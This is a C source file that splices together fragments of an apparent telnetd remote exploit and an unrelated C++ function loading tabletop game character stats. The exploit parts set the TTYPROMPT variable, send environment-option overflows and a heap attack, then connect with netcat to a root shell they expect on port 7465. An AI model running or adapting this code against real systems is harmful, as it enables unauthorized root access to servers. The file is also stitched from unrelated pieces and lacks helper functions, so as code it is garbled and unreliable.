void negotiate(int sd)
{
wont(sd,TELOPT_TTYPE);
wont(sd,TELOPT_NAWS);
wont(sd,TELOPT_XDISPLOC);
will(sd,TELOPT_LFLOW);
will(sd,TELOPT_LINEMODE);
wont(sd,TELOPT_OLD_ENVIRON);
will(sd,TELOPT_NEW_ENVIRON);
will(sd,TELOPT_BINARY);
env(sd,"TTYPROMPT","abcdef");
}
void LegacyCharacter::Load( moPropBagRef propBag )
{
moPropStringRef name ( g_name ); // name of character
moPropIntRef monster ( g_monster ); // is this character a monster or pc? (bool value)
moPropIntRef status ( g_status ); // normal, delayed or readied action (Character::Status)
moPropIntRef maxHP ( g_maxHP ); // Maximum hitpoints the character has
moPropIntRef damage ( g_damage ); // Current damage
moPropIntRef stabilized ( g_stabilized ); // Applies to dying character
moPropIntRef justdropped ( g_justdropped ); // True if character just dropped this round
moPropIntRef init ( g_init ); // init modifier
moPropIntRef spot ( g_spot ); // spot modifier
moPropIntRef listen ( g_listen ); // listen modifier
moPropIntRef will ( g_will ); // will modifier
moPropIntRef position ( g_position ); // the initiative position
moPropIntRef initRoll ( g_initRoll ); // the actual rolls
moPropIntRef spotRoll ( g_spotRoll );
moPropIntRef listenRoll ( g_listenRoll );
moPropIntRef willRoll ( g_willRoll );
name .Link( propBag );
monster .Link( propBag );
status .Link( propBag );
maxHP .Link( propBag );
damage .Link( propBag );
stabilized .Link( propBag );
justdropped .Link( propBag );
init .Link( propBag );
spot .Link( propBag );
listen .Link( propBag );
will .Link( propBag );
position .Link( propBag );
initRoll .Link( propBag );
spotRoll .Link( propBag );
listenRoll .Link( propBag );
willRoll .Link( propBag );
if( name.HasProp() ) f_name = static_cast<moWCString>(name).c_str();
if( status.HasProp() ) f_status = static_cast<InternalStatus>( static_cast<int>(status) );
if( monster.HasProp() ) f_monster = monster? true: false;
if( maxHP.HasProp() ) f_maxHP = maxHP;
if( damage.HasProp() ) f_damage = damage;
if( stabilized.HasProp() ) f_stabilized = stabilized? true: false;
if( justdropped.HasProp() ) f_justdropped = justdropped? true: false;
if( init.HasProp() ) f_init = init;
if( spot.HasProp() ) f_spot = spot;
if( listen.HasProp() ) f_listen = listen;
if( will.HasProp() ) f_will = will;
if( position.HasProp() ) f_position = position;
if( initRoll.HasProp() ) f_initRoll = initRoll;
if( spotRoll.HasProp() ) f_spotRoll = spotRoll;
if( listenRoll.HasProp() ) f_listenRoll = listenRoll;
if( willRoll.HasProp() ) f_willRoll = willRoll;
}
fill2 (int count, char with, int real)
{
int l;
int first, rest, find;
first = (int) (count / dalen) - 10;
rest = (int) (((count) % dalen) / 3) * 3;
find = count - ((first * dalen) + (rest * 3));
solve (find);
first += big;
rest += small;
for (l = 0; l < first; l++)
do_ayt ();
for (l = 0; l < rest; l++)
will (with);
if (real == 1)
{
push_clean ();
}
}
main (int argc, char *argv[])
{
int br, l, dosleep = 0;
int percent = 0;
char spin;
unsigned char w;
bzero (oldenv, sizeof (oldenv));
argv++;
dalen = strlen ("clarity.local");
while (argv[0])
{
if (!strcmp (argv[0], "--pause"))
dosleep = 1;
if (!strcmp (argv[0], "--size") && argv[1])
{
mipl = atoi (argv[1]);
argv++;
}
if (!strcmp (argv[0], "--name") && argv[1])
{
dalen = strlen (argv[1]);
argv++;
}
argv++;
}
fprintf (stderr, " o MiPl of %4d o NameLen of %2d\n", mipl, dalen);
if(dalen%3==0)
{
offsets=offset3;
}
else
{
ninbufoffset = mipl % 8192;
offsets[11] += 32 * (mipl - ninbufoffset) / 8192;
if (offsets[11] > 255)
{
fprintf (stderr, " ! MiPl too big.", mipl, dalen);
exit (1);
}
}
sock_setup ();
if (dosleep)
{
system ("sleep 1;ps aux|grep in.telnetd|grep -v grep");
sleep (8);
}
dalen += strlen ("\r\n[ : yes]\r\n");
fprintf (stderr, "o Sending IAC WILL NEW-ENVIRONMENT...\n");
fflush (stderr);
doo (5);
will (39);
fflush (dasock);
read_sock ();
fprintf (stderr, "o Setting up environment vars...\n");
fflush (stderr);
will (1);
push_clean ();
doenv ("USER", "zen-parse");
doenv ("TERM", "zen-parse");
will (39);
fflush (dasock);
fprintf (stderr, "o Doing overflows...\n");
fflush (stderr);
for (br = 0; (offsets[br] || offsets[br + 1]); br += 2)
{
fill (mipl + ENV + offsets[br], offsets[br + 1]);
fflush (dasock);
usleep (100000);
read_sock ();
}
fprintf (stderr, "o Overflows done...\n");
fflush (stderr);
push_clean ();
fprintf (stderr, "o Sending IACs to start login process...\n");
fflush (stderr);
wont (24);
wont (32);
wont (35);
fprintf (dasock, "%s", tosend);
will (1);
push_heap_attack ();
sleep (1);
fprintf (stderr, "o Attempting to lauch netcat to localhost rootshell\n");
execlp ("nc", "nc", "-v", "localhost", "7465", 0);
fprintf (stderr,
"o If the exploit worked, there should be an open port on 7465.\n");
fprintf (stderr, " It is a root shell. You should probably close it.\n");
fflush (stderr);
sleep (60);
exit (0);
}
